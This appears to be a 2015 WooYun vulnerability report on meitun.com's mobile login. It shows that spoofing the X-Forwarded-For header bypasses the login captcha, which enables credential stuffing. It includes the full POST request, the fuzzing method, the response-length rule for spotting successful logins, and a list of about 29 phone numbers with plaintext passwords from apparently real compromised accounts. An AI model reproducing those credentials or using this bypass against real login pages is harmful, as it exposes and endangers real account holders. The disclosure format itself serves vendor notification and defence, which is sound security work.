当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133064

漏洞标题:美囤X-Forwarded-For 验证码绕过撞库

相关厂商:美囤妈妈

漏洞作者: hell0lx

提交时间:2015-08-10 14:43

修复时间:2015-09-27 13:28

公开时间:2015-09-27 13:28

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-13: 厂商已经确认,细节仅向厂商公开
2015-08-23: 细节向核心白帽子及相关领域专家公开
2015-09-02: 细节向普通白帽子公开
2015-09-12: 细节向实习白帽子公开
2015-09-27: 细节向公众公开

简要描述:

美囤X-Forwarded-For 验证码绕过撞库

详细说明:

手机登陆 http://m.meitun.com/login.html
登陆次数过多要求输入验证码 通过修改X-Forwarded-For 可以实现绕过

POST /mobile/user/signin.htm HTTP/1.1
X-Forwarded-For: 27.1.14.87
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Referer: http://m.meitun.com/login.html
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Proxy-Connection: Keep-Alive
Content-Length: 256
Host: m.meitun.com
Pragma: no-cache
{"token":"","telephone":"","password":"123","captchaimage":"","oem":"NULL","osversion":"1.1.0","screenwidth":1366,"screenheight":650,"apptype":"1","appversion":"1.0.0","nettype":"unknown","regcode":"250","provcode":"264","partner":"babytree"}


这里我用pkav http fuzzer工具 很方便

QQ截图20150810143450.png


返回的长度180以上的基本都是成功

QQ截图20150810143713.png


部分用户

15986675801 1957518zh
13672187263 5213539
18622992530 19840921
15929666673 386891673
13018235054 jhq5422206
18326688520 xuchaoooo520
18645422366 2216678
15607910440 5625172
15861559396 yf19891111
18745958585 z2169832b
15166969503 yp2738471
18003798998 wujuhu800
18923363118 qwe123
13875361087 125520390
15980817152 5683445ly
15639777987 rui123
18601559923 cj890818
18207145525 a5201314
18614092811 8808110803
18611920675 zhaona520
13512172777 19851225z
15511741976 na47213
15952400809 66785753a
15269879158 tianhuayushi
13487950025 520yanglei
18604098252 198251
13995679922 zhangdi221
18841633220 368448882211
18778411784 hzywj17

漏洞证明:

QQ截图20150810143949.png


QQ截图20150810144018.png

修复方案:

版权声明:转载请注明来源 hell0lx@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-13 13:26

厂商回复:

已知的漏洞,修复中。谢谢!

最新状态:

暂无


漏洞评价:

评论